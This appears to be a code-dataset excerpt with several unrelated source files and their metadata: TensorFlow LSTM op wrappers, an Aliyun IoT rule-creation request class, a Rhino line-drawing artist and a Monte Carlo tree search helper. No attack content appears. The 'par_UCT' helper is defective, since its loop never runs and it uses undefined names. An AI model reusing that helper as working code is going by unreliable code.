001T\022\013\n\006h_prev\"\001T\022\006\n\001w\"\001T\022\010\n\003wci\"\001T\022\010\n\003wcf\"\001T\022\010\n\003wco\"\001T\022\006\n\001b\"\001T\022\006\n\001i\"\001T\022\007\n\002cs\"\001T\022\006\n\001f\"\001T\022\006\n\001o\"\001T\022\007\n\002ci\"\001T\022\007\n\002co\"\001T\022\014\n\007cs_grad\"\001T\022\013\n\006h_grad\"\001T\032\021\n\014cs_prev_grad\"\001T\032\n\n\005dicfo\"\001T\032\r\n\010wci_grad\"\001T\032\r\n\010wcf_grad\"\001T\032\r\n\010wco_grad\"\001T\"\024\n\014use_peephole\022\004bool\"\021\n\001T\022\004type:\006\n\0042\002\023\001")
| 36.591667
| 2,646
| 0.624488
|
import collections as _collections
import six as _six
from tensorflow.python import pywrap_tensorflow as _pywrap_tensorflow
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.eager import execute as _execute
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import errors as _errors
from tensorflow.python.framework import tensor_shape as _tensor_shape
from tensorflow.core.framework import op_def_pb2 as _op_def_pb2
from tensorflow.python.framework import common_shapes as _common_shapes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
from tensorflow.python.util.deprecation import deprecated_endpoints
from tensorflow.python.util.tf_export import tf_export
_block_lstm_outputs = ["i", "cs", "f", "o", "ci", "co", "h"]
_BlockLSTMOutput = _collections.namedtuple(
"BlockLSTM", _block_lstm_outputs)
@tf_export('block_lstm')
def block_lstm(seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b, forget_bias=1, cell_clip=3, use_peephole=False, name=None):
_ctx = _context._context
if _ctx is None or not _ctx._eager_context.is_eager:
if forget_bias is None:
forget_bias = 1
forget_bias = _execute.make_float(forget_bias, "forget_bias")
if cell_clip is None:
cell_clip = 3
cell_clip = _execute.make_float(cell_clip, "cell_clip")
if use_peephole is None:
use_peephole = False
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_, _, _op = _op_def_lib._apply_op_helper(
"BlockLSTM", seq_len_max=seq_len_max, x=x, cs_prev=cs_prev,
h_prev=h_prev, w=w, wci=wci, wcf=wcf, wco=wco, b=b,
forget_bias=forget_bias, cell_clip=cell_clip,
use_peephole=use_peephole, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("forget_bias", _op.get_attr("forget_bias"), "cell_clip",
_op.get_attr("cell_clip"), "use_peephole",
_op.get_attr("use_peephole"), "T", _op.get_attr("T"))
_execute.record_gradient(
"BlockLSTM", _inputs_flat, _attrs, _result, name)
_result = _BlockLSTMOutput._make(_result)
return _result
else:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._eager_context.device_name, "BlockLSTM",
name, _ctx._post_execution_callbacks, seq_len_max, x, cs_prev, h_prev,
w, wci, wcf, wco, b, "forget_bias", forget_bias, "cell_clip",
cell_clip, "use_peephole", use_peephole)
_result = _BlockLSTMOutput._make(_result)
return _result
except _core._FallbackException:
return block_lstm_eager_fallback(
seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b,
forget_bias=forget_bias, cell_clip=cell_clip,
use_peephole=use_peephole, name=name, ctx=_ctx)
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
def block_lstm_eager_fallback(seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b, forget_bias=1, cell_clip=3, use_peephole=False, name=None, ctx=None):
_ctx = ctx if ctx else _context.context()
if forget_bias is None:
forget_bias = 1
forget_bias = _execute.make_float(forget_bias, "forget_bias")
if cell_clip is None:
cell_clip = 3
cell_clip = _execute.make_float(cell_clip, "cell_clip")
if use_peephole is None:
use_peephole = False
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_attr_T, _inputs_T = _execute.args_to_matching_eager([x, cs_prev, h_prev, w, wci, wcf, wco, b], _ctx)
(x, cs_prev, h_prev, w, wci, wcf, wco, b) = _inputs_T
seq_len_max = _ops.convert_to_tensor(seq_len_max, _dtypes.int64)
_inputs_flat = [seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b]
_attrs = ("forget_bias", forget_bias, "cell_clip", cell_clip,
"use_peephole", use_peephole, "T", _attr_T)
_result = _execute.execute(b"BlockLSTM", 7, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"BlockLSTM", _inputs_flat, _attrs, _result, name)
_result = _BlockLSTMOutput._make(_result)
return _result
_ops.RegisterShape("BlockLSTM")(None)
_block_lstm_grad_outputs = ["x_grad", "cs_prev_grad", "h_prev_grad", "w_grad",
"wci_grad", "wcf_grad", "wco_grad", "b_grad"]
_BlockLSTMGradOutput = _collections.namedtuple(
"BlockLSTMGrad", _block_lstm_grad_outputs)
@tf_export('block_lstm_grad')
def block_lstm_grad(seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, h, cs_grad, h_grad, use_peephole, name=None):
_ctx = _context._context
if _ctx is None or not _ctx._eager_context.is_eager:
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_, _, _op = _op_def_lib._apply_op_helper(
"BlockLSTMGrad", seq_len_max=seq_len_max, x=x, cs_prev=cs_prev,
h_prev=h_prev, w=w, wci=wci, wcf=wcf, wco=wco, b=b, i=i, cs=cs, f=f,
o=o, ci=ci, co=co, h=h, cs_grad=cs_grad, h_grad=h_grad,
use_peephole=use_peephole, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("use_peephole", _op.get_attr("use_peephole"), "T",
_op.get_attr("T"))
_execute.record_gradient(
"BlockLSTMGrad", _inputs_flat, _attrs, _result, name)
_result = _BlockLSTMGradOutput._make(_result)
return _result
else:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._eager_context.device_name,
"BlockLSTMGrad", name, _ctx._post_execution_callbacks, seq_len_max, x,
cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, h, cs_grad,
h_grad, "use_peephole", use_peephole)
_result = _BlockLSTMGradOutput._make(_result)
return _result
except _core._FallbackException:
return block_lstm_grad_eager_fallback(
seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o,
ci, co, h, cs_grad, h_grad, use_peephole=use_peephole, name=name,
ctx=_ctx)
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
def block_lstm_grad_eager_fallback(seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, h, cs_grad, h_grad, use_peephole, name=None, ctx=None):
_ctx = ctx if ctx else _context.context()
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_attr_T, _inputs_T = _execute.args_to_matching_eager([x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, h, cs_grad, h_grad], _ctx)
(x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, h, cs_grad, h_grad) = _inputs_T
seq_len_max = _ops.convert_to_tensor(seq_len_max, _dtypes.int64)
_inputs_flat = [seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, h, cs_grad, h_grad]
_attrs = ("use_peephole", use_peephole, "T", _attr_T)
_result = _execute.execute(b"BlockLSTMGrad", 8, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"BlockLSTMGrad", _inputs_flat, _attrs, _result, name)
_result = _BlockLSTMGradOutput._make(_result)
return _result
_ops.RegisterShape("BlockLSTMGrad")(None)
_lstm_block_cell_outputs = ["i", "cs", "f", "o", "ci", "co", "h"]
_LSTMBlockCellOutput = _collections.namedtuple(
"LSTMBlockCell", _lstm_block_cell_outputs)
@tf_export('lstm_block_cell')
def lstm_block_cell(x, cs_prev, h_prev, w, wci, wcf, wco, b, forget_bias=1, cell_clip=3, use_peephole=False, name=None):
_ctx = _context._context
if _ctx is None or not _ctx._eager_context.is_eager:
if forget_bias is None:
forget_bias = 1
forget_bias = _execute.make_float(forget_bias, "forget_bias")
if cell_clip is None:
cell_clip = 3
cell_clip = _execute.make_float(cell_clip, "cell_clip")
if use_peephole is None:
use_peephole = False
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_, _, _op = _op_def_lib._apply_op_helper(
"LSTMBlockCell", x=x, cs_prev=cs_prev, h_prev=h_prev, w=w, wci=wci,
wcf=wcf, wco=wco, b=b, forget_bias=forget_bias, cell_clip=cell_clip,
use_peephole=use_peephole, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("forget_bias", _op.get_attr("forget_bias"), "cell_clip",
_op.get_attr("cell_clip"), "use_peephole",
_op.get_attr("use_peephole"), "T", _op.get_attr("T"))
_execute.record_gradient(
"LSTMBlockCell", _inputs_flat, _attrs, _result, name)
_result = _LSTMBlockCellOutput._make(_result)
return _result
else:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._eager_context.device_name,
"LSTMBlockCell", name, _ctx._post_execution_callbacks, x, cs_prev,
h_prev, w, wci, wcf, wco, b, "forget_bias", forget_bias, "cell_clip",
cell_clip, "use_peephole", use_peephole)
_result = _LSTMBlockCellOutput._make(_result)
return _result
except _core._FallbackException:
return lstm_block_cell_eager_fallback(
x, cs_prev, h_prev, w, wci, wcf, wco, b, forget_bias=forget_bias,
cell_clip=cell_clip, use_peephole=use_peephole, name=name, ctx=_ctx)
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
def lstm_block_cell_eager_fallback(x, cs_prev, h_prev, w, wci, wcf, wco, b, forget_bias=1, cell_clip=3, use_peephole=False, name=None, ctx=None):
_ctx = ctx if ctx else _context.context()
if forget_bias is None:
forget_bias = 1
forget_bias = _execute.make_float(forget_bias, "forget_bias")
if cell_clip is None:
cell_clip = 3
cell_clip = _execute.make_float(cell_clip, "cell_clip")
if use_peephole is None:
use_peephole = False
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_attr_T, _inputs_T = _execute.args_to_matching_eager([x, cs_prev, h_prev, w, wci, wcf, wco, b], _ctx)
(x, cs_prev, h_prev, w, wci, wcf, wco, b) = _inputs_T
_inputs_flat = [x, cs_prev, h_prev, w, wci, wcf, wco, b]
_attrs = ("forget_bias", forget_bias, "cell_clip", cell_clip,
"use_peephole", use_peephole, "T", _attr_T)
_result = _execute.execute(b"LSTMBlockCell", 7, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"LSTMBlockCell", _inputs_flat, _attrs, _result, name)
_result = _LSTMBlockCellOutput._make(_result)
return _result
_ops.RegisterShape("LSTMBlockCell")(None)
_lstm_block_cell_grad_outputs = ["cs_prev_grad", "dicfo", "wci_grad",
"wcf_grad", "wco_grad"]
_LSTMBlockCellGradOutput = _collections.namedtuple(
"LSTMBlockCellGrad", _lstm_block_cell_grad_outputs)
@tf_export('lstm_block_cell_grad')
def lstm_block_cell_grad(x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, cs_grad, h_grad, use_peephole, name=None):
_ctx = _context._context
if _ctx is None or not _ctx._eager_context.is_eager:
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_, _, _op = _op_def_lib._apply_op_helper(
"LSTMBlockCellGrad", x=x, cs_prev=cs_prev, h_prev=h_prev, w=w,
wci=wci, wcf=wcf, wco=wco, b=b, i=i, cs=cs, f=f, o=o, ci=ci, co=co,
cs_grad=cs_grad, h_grad=h_grad, use_peephole=use_peephole, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("use_peephole", _op.get_attr("use_peephole"), "T",
_op.get_attr("T"))
_execute.record_gradient(
"LSTMBlockCellGrad", _inputs_flat, _attrs, _result, name)
_result = _LSTMBlockCellGradOutput._make(_result)
return _result
else:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._eager_context.device_name,
"LSTMBlockCellGrad", name, _ctx._post_execution_callbacks, x, cs_prev,
h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, cs_grad, h_grad,
"use_peephole", use_peephole)
_result = _LSTMBlockCellGradOutput._make(_result)
return _result
except _core._FallbackException:
return lstm_block_cell_grad_eager_fallback(
x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co,
cs_grad, h_grad, use_peephole=use_peephole, name=name, ctx=_ctx)
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
def lstm_block_cell_grad_eager_fallback(x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, cs_grad, h_grad, use_peephole, name=None, ctx=None):
_ctx = ctx if ctx else _context.context()
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_attr_T, _inputs_T = _execute.args_to_matching_eager([x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, cs_grad, h_grad], _ctx)
(x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, cs_grad, h_grad) = _inputs_T
_inputs_flat = [x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, cs_grad, h_grad]
_attrs = ("use_peephole", use_peephole, "T", _attr_T)
_result = _execute.execute(b"LSTMBlockCellGrad", 5, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"LSTMBlockCellGrad", _inputs_flat, _attrs, _result, name)
_result = _LSTMBlockCellGradOutput._make(_result)
return _result
_ops.RegisterShape("LSTMBlockCellGrad")(None)
def _InitOpDefLibrary(op_list_proto_bytes):
op_list = _op_def_pb2.OpList()
op_list.ParseFromString(op_list_proto_bytes)
_op_def_registry.register_op_list(op_list)
op_def_lib = _op_def_library.OpDefLibrary()
op_def_lib.add_op_list(op_list)
return op_def_lib
_op_def_lib = _InitOpDefLibrary(b"\n\215\002\n\tBlockLSTM\022\017\n\013seq_len_max\030\t\022\006\n\001x\"\001T\022\014\n\007cs_prev\"\001T\022\013\n\006h_prev\"\001T\022\006\n\001w\"\001T\022\010\n\003wci\"\001T\022\010\n\003wcf\"\001T\022\010\n\003wco\"\001T\022\006\n\001b\"\001T\032\006\n\001i\"\001T\032\007\n\002cs\"\001T\032\006\n\001f\"\001T\032\006\n\001o\"\001T\032\007\n\002ci\"\001T\032\007\n\002co\"\001T\032\006\n\001h\"\001T\"\033\n\013forget_bias\022\005float\032\005%\000\000\200?\"\031\n\tcell_clip\022\005float\032\005%\000\000@@\"\030\n\014use_peephole\022\004bool\032\002(\000\"\021\n\001T\022\004type:\006\n\0042\002\023\001\n\351\002\n\rBlockLSTMGrad\022\017\n\013seq_len_max\030\t\022\006\n\001x\"\001T\022\014\n\007cs_prev\"\001T\022\013\n\006h_prev\"\001T\022\006\n\001w\"\001T\022\010\n\003wci\"\001T\022\010\n\003wcf\"\001T\022\010\n\003wco\"\001T\022\006\n\001b\"\001T\022\006\n\001i\"\001T\022\007\n\002cs\"\001T\022\006\n\001f\"\001T\022\006\n\001o\"\001T\022\007\n\002ci\"\001T\022\007\n\002co\"\001T\022\006\n\001h\"\001T\022\014\n\007cs_grad\"\001T\022\013\n\006h_grad\"\001T\032\013\n\006x_grad\"\001T\032\021\n\014cs_prev_grad\"\001T\032\020\n\013h_prev_grad\"\001T\032\013\n\006w_grad\"\001T\032\r\n\010wci_grad\"\001T\032\r\n\010wcf_grad\"\001T\032\r\n\010wco_grad\"\001T\032\013\n\006b_grad\"\001T\"\024\n\014use_peephole\022\004bool\"\021\n\001T\022\004type:\006\n\0042\002\023\001\n\200\002\n\rLSTMBlockCell\022\006\n\001x\"\001T\022\014\n\007cs_prev\"\001T\022\013\n\006h_prev\"\001T\022\006\n\001w\"\001T\022\010\n\003wci\"\001T\022\010\n\003wcf\"\001T\022\010\n\003wco\"\001T\022\006\n\001b\"\001T\032\006\n\001i\"\001T\032\007\n\002cs\"\001T\032\006\n\001f\"\001T\032\006\n\001o\"\001T\032\007\n\002ci\"\001T\032\007\n\002co\"\001T\032\006\n\001h\"\001T\"\033\n\013forget_bias\022\005float\032\005%\000\000\200?\"\031\n\tcell_clip\022\005float\032\005%\000\000@@\"\030\n\014use_peephole\022\004bool\032\002(\000\"\021\n\001T\022\004type:\006\n\0042\002\023\001\n\247\002\n\021LSTMBlockCellGrad\022\006\n\001x\"\001T\022\014\n\007cs_prev\"\001T\022\013\n\006h_prev\"\001T\022\006\n\001w\"\001T\022\010\n\003wci\"\001T\022\010\n\003wcf\"\001T\022\010\n\003wco\"\001T\022\006\n\001b\"\001T\022\006\n\001i\"\001T\022\007\n\002cs\"\001T\022\006\n\001f\"\001T\022\006\n\001o\"\001T\022\007\n\002ci\"\001T\022\007\n\002co\"\001T\022\014\n\007cs_grad\"\001T\022\013\n\006h_grad\"\001T\032\021\n\014cs_prev_grad\"\001T\032\n\n\005dicfo\"\001T\032\r\n\010wci_grad\"\001T\032\r\n\010wcf_grad\"\001T\032\r\n\010wco_grad\"\001T\"\024\n\014use_peephole\022\004bool\"\021\n\001T\022\004type:\006\n\0042\002\023\001")
| true
| true
|
790dd5c09d0dc1c89b8d4a0593284a76bc85748f
| 3,042
|
py
|
Python
|
aliyun-python-sdk-iot/aliyunsdkiot/request/v20180120/CreateRuleRequest.py
|
liuzheng/aliyun-openapi-python-sdk
|
1ba6743f3d6f2cef57ec9e3be1754b04293c3150
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-iot/aliyunsdkiot/request/v20180120/CreateRuleRequest.py
|
liuzheng/aliyun-openapi-python-sdk
|
1ba6743f3d6f2cef57ec9e3be1754b04293c3150
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-iot/aliyunsdkiot/request/v20180120/CreateRuleRequest.py
|
liuzheng/aliyun-openapi-python-sdk
|
1ba6743f3d6f2cef57ec9e3be1754b04293c3150
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkiot.endpoint import endpoint_data
class CreateRuleRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Iot', '2018-01-20', 'CreateRule')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_Select(self):
return self.get_query_params().get('Select')
def set_Select(self,Select):
self.add_query_param('Select',Select)
def get_RuleDesc(self):
return self.get_query_params().get('RuleDesc')
def set_RuleDesc(self,RuleDesc):
self.add_query_param('RuleDesc',RuleDesc)
def get_ShortTopic(self):
return self.get_query_params().get('ShortTopic')
def set_ShortTopic(self,ShortTopic):
self.add_query_param('ShortTopic',ShortTopic)
def get_ResourceGroupId(self):
return self.get_query_params().get('ResourceGroupId')
def set_ResourceGroupId(self,ResourceGroupId):
self.add_query_param('ResourceGroupId',ResourceGroupId)
def get_DataType(self):
return self.get_query_params().get('DataType')
def set_DataType(self,DataType):
self.add_query_param('DataType',DataType)
def get_IotInstanceId(self):
return self.get_query_params().get('IotInstanceId')
def set_IotInstanceId(self,IotInstanceId):
self.add_query_param('IotInstanceId',IotInstanceId)
def get_Where(self):
return self.get_query_params().get('Where')
def set_Where(self,Where):
self.add_query_param('Where',Where)
def get_TopicType(self):
return self.get_query_params().get('TopicType')
def set_TopicType(self,TopicType):
self.add_query_param('TopicType',TopicType)
def get_ProductKey(self):
return self.get_query_params().get('ProductKey')
def set_ProductKey(self,ProductKey):
self.add_query_param('ProductKey',ProductKey)
def get_Name(self):
return self.get_query_params().get('Name')
def set_Name(self,Name):
self.add_query_param('Name',Name)
def get_Topic(self):
return self.get_query_params().get('Topic')
def set_Topic(self,Topic):
self.add_query_param('Topic',Topic)
| 31.040816
| 74
| 0.753123
|
from aliyunsdkcore.request import RpcRequest
from aliyunsdkiot.endpoint import endpoint_data
class CreateRuleRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Iot', '2018-01-20', 'CreateRule')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_Select(self):
return self.get_query_params().get('Select')
def set_Select(self,Select):
self.add_query_param('Select',Select)
def get_RuleDesc(self):
return self.get_query_params().get('RuleDesc')
def set_RuleDesc(self,RuleDesc):
self.add_query_param('RuleDesc',RuleDesc)
def get_ShortTopic(self):
return self.get_query_params().get('ShortTopic')
def set_ShortTopic(self,ShortTopic):
self.add_query_param('ShortTopic',ShortTopic)
def get_ResourceGroupId(self):
return self.get_query_params().get('ResourceGroupId')
def set_ResourceGroupId(self,ResourceGroupId):
self.add_query_param('ResourceGroupId',ResourceGroupId)
def get_DataType(self):
return self.get_query_params().get('DataType')
def set_DataType(self,DataType):
self.add_query_param('DataType',DataType)
def get_IotInstanceId(self):
return self.get_query_params().get('IotInstanceId')
def set_IotInstanceId(self,IotInstanceId):
self.add_query_param('IotInstanceId',IotInstanceId)
def get_Where(self):
return self.get_query_params().get('Where')
def set_Where(self,Where):
self.add_query_param('Where',Where)
def get_TopicType(self):
return self.get_query_params().get('TopicType')
def set_TopicType(self,TopicType):
self.add_query_param('TopicType',TopicType)
def get_ProductKey(self):
return self.get_query_params().get('ProductKey')
def set_ProductKey(self,ProductKey):
self.add_query_param('ProductKey',ProductKey)
def get_Name(self):
return self.get_query_params().get('Name')
def set_Name(self,Name):
self.add_query_param('Name',Name)
def get_Topic(self):
return self.get_query_params().get('Topic')
def set_Topic(self,Topic):
self.add_query_param('Topic',Topic)
| true
| true
|
790dd60430b6b1e8b7c79bdda4a8bfebf564e295
| 3,307
|
py
|
Python
|
src/compas_rhino/artists/lineartist.py
|
archimarkGit/compas
|
a953df2fca778e27bdf02437fcf8ff2b7d924c73
|
[
"MIT"
] | null | null | null |
src/compas_rhino/artists/lineartist.py
|
archimarkGit/compas
|
a953df2fca778e27bdf02437fcf8ff2b7d924c73
|
[
"MIT"
] | null | null | null |
src/compas_rhino/artists/lineartist.py
|
archimarkGit/compas
|
a953df2fca778e27bdf02437fcf8ff2b7d924c73
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
try:
basestring
except NameError:
basestring = str
import compas_rhino
from compas.utilities import iterable_like
from compas_rhino.artists._primitiveartist import PrimitiveArtist
__all__ = ['LineArtist']
class LineArtist(PrimitiveArtist):
"""Artist for drawing lines.
Parameters
----------
primitive : :class:`compas.geometry.Line`
A COMPAS line.
Notes
-----
See :class:`compas_rhino.artists.PrimitiveArtist` for all other parameters.
"""
def draw(self):
"""Draw the line.
Returns
-------
list
The GUIDs of the created Rhino objects.
"""
start = list(self.primitive.start)
end = list(self.primitive.end)
lines = [{'start': start, 'end': end, 'color': self.color, 'name': self.name}]
guids = compas_rhino.draw_lines(lines, layer=self.layer, clear=False, redraw=False)
self._guids = guids
return guids
@staticmethod
def draw_collection(collection, names=None, colors=None, layer=None, clear=False, add_to_group=False, group_name=None):
"""Draw a collection of lines.
Parameters
----------
collection: list of compas.geometry.Line
A collection of ``Line`` objects.
names : list of str, optional
Individual names for the lines.
colors : color or list of color, optional
A color specification for the lines as a single color or a list of individual colors.
layer : str, optional
A layer path.
clear : bool, optional
Clear the layer before drawing.
add_to_group : bool, optional
Add the frames to a group.
group_name : str, optional
Name of the group.
Returns
-------
guids: list
A list of GUIDs if the collection is not grouped.
groupname: str
The name of the group if the collection objects are grouped.
"""
lines = [{'start': list(line[0]), 'end': list(line[1])} for line in collection]
if colors:
if isinstance(colors[0], (int, float)):
colors = iterable_like(collection, [colors], colors)
else:
colors = iterable_like(collection, colors, colors[0])
for line, rgb in zip(lines, colors):
line['color'] = rgb
if names:
if isinstance(names, basestring):
names = iterable_like(collection, [names], names)
else:
names = iterable_like(collection, names, names[0])
for line, name in zip(lines, names):
line['name'] = name
guids = compas_rhino.draw_lines(lines, layer=layer, clear=clear)
if not add_to_group:
return guids
group = compas_rhino.rs.AddGroup(group_name)
if group:
compas_rhino.rs.AddObjectsToGroup(guids, group)
return group
# ==============================================================================
# Main
# ==============================================================================
if __name__ == "__main__":
pass
| 30.62037
| 123
| 0.566979
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
try:
basestring
except NameError:
basestring = str
import compas_rhino
from compas.utilities import iterable_like
from compas_rhino.artists._primitiveartist import PrimitiveArtist
__all__ = ['LineArtist']
class LineArtist(PrimitiveArtist):
def draw(self):
start = list(self.primitive.start)
end = list(self.primitive.end)
lines = [{'start': start, 'end': end, 'color': self.color, 'name': self.name}]
guids = compas_rhino.draw_lines(lines, layer=self.layer, clear=False, redraw=False)
self._guids = guids
return guids
@staticmethod
def draw_collection(collection, names=None, colors=None, layer=None, clear=False, add_to_group=False, group_name=None):
lines = [{'start': list(line[0]), 'end': list(line[1])} for line in collection]
if colors:
if isinstance(colors[0], (int, float)):
colors = iterable_like(collection, [colors], colors)
else:
colors = iterable_like(collection, colors, colors[0])
for line, rgb in zip(lines, colors):
line['color'] = rgb
if names:
if isinstance(names, basestring):
names = iterable_like(collection, [names], names)
else:
names = iterable_like(collection, names, names[0])
for line, name in zip(lines, names):
line['name'] = name
guids = compas_rhino.draw_lines(lines, layer=layer, clear=clear)
if not add_to_group:
return guids
group = compas_rhino.rs.AddGroup(group_name)
if group:
compas_rhino.rs.AddObjectsToGroup(guids, group)
return group
if __name__ == "__main__":
pass
| true
| true
|
790dd6370c24d19ef81de7752b882b6cd395e555
| 1,901
|
py
|
Python
|
Version2/ivan/rlcard/rlcard/agents/mcmphelp.py
|
guy477/Poker
|
d10e5af396509cd425aedc27198bb30c0709f43b
|
[
"MIT"
] | 2
|
2021-05-03T01:57:06.000Z
|
2022-03-30T02:56:11.000Z
|
ignitionBot/ivan/rlcard/rlcard/agents/mcmphelp.py
|
guy477/Poker
|
d10e5af396509cd425aedc27198bb30c0709f43b
|
[
"MIT"
] | null | null | null |
ignitionBot/ivan/rlcard/rlcard/agents/mcmphelp.py
|
guy477/Poker
|
d10e5af396509cd425aedc27198bb30c0709f43b
|
[
"MIT"
] | 1
|
2021-02-17T06:17:37.000Z
|
2021-02-17T06:17:37.000Z
|
def par_UCT(rootstate, rootnode, itermax):
print('hi')
for i in range(0):
node = rootnode
state = rootstate.clone()
# Select
while node.untriedMoves == [] and node.childNodes != []: # node is fully expanded and non-terminal
node = node.UCTSelectChild()
state.do_move(node.move)
# Expand
if node.untriedMoves != []: # if we can expand (i.e. state/node is non-terminal)
m = random.choice(node.untriedMoves)
state.do_move(m)
node = node.AddChild(m,state) # add child and descend tree
# Rollout - this can often be made orders of magnitude quicker using a state.GetRandomMove() function
while state.get_moves() != []: # while state is non-terminal
# print('---------')
# print(state.credits)
# print(state._get_player_turn())
# print(state.get_moves())
# print(state.moves_taken)
# probs = [1 for x in state.get_moves()]
# if(5 in state.get_moves()):
# probs[-1] -= .5
state.do_move(random.choice(state.get_moves()))
# Backpropagate
while node != None: # backpropagate from the expanded node and work back to the root node
node.Update(state.get_result(node.playerJustMoved)) # state is terminal. Update node with result from POV of node.playerJustMoved
node = node.parentNode
# Output some information about the tree - can be omitted
if (verbose): print(rootnode.TreeToString(0))
else:
# print(rootnode.ChildrenToString())
pass
# determine general performance of hand
return sorted(rootnode.childNodes, key = lambda c: c.visits)[-1].move
| 44.209302
| 145
| 0.557601
|
def par_UCT(rootstate, rootnode, itermax):
print('hi')
for i in range(0):
node = rootnode
state = rootstate.clone()
while node.untriedMoves == [] and node.childNodes != []:
node = node.UCTSelectChild()
state.do_move(node.move)
if node.untriedMoves != []:
m = random.choice(node.untriedMoves)
state.do_move(m)
node = node.AddChild(m,state)
while state.get_moves() != []:
state.do_move(random.choice(state.get_moves()))
while node != None:
node.Update(state.get_result(node.playerJustMoved))
node = node.parentNode
if (verbose): print(rootnode.TreeToString(0))
else:
pass
return sorted(rootnode.childNodes, key = lambda c: c.visits)[-1].move
| false
| true
|
790dd65a065516ff8e7ef93065f71014e83c9436
| 1,905
|
py
|
Python
|
python/eggroll/core/aspects.py
|
liszekei/eggroll
|
6a8cc5e1c9106d2633dc415092151f921f003743
|
[
"Apache-2.0"
] | 209
|
2019-08-08T18:38:26.000Z
|
2022-03-23T06:20:40.000Z
|
python/eggroll/core/aspects.py
|
liszekei/eggroll
|
6a8cc5e1c9106d2633dc415092151f921f003743
|
[
"Apache-2.0"
] | 110
|
2019-08-09T02:50:47.000Z
|
2022-03-07T10:30:21.000Z
|
python/eggroll/core/aspects.py
|
liszekei/eggroll
|
6a8cc5e1c9106d2633dc415092151f921f003743
|
[
"Apache-2.0"
] | 77
|
2019-08-15T08:11:52.000Z
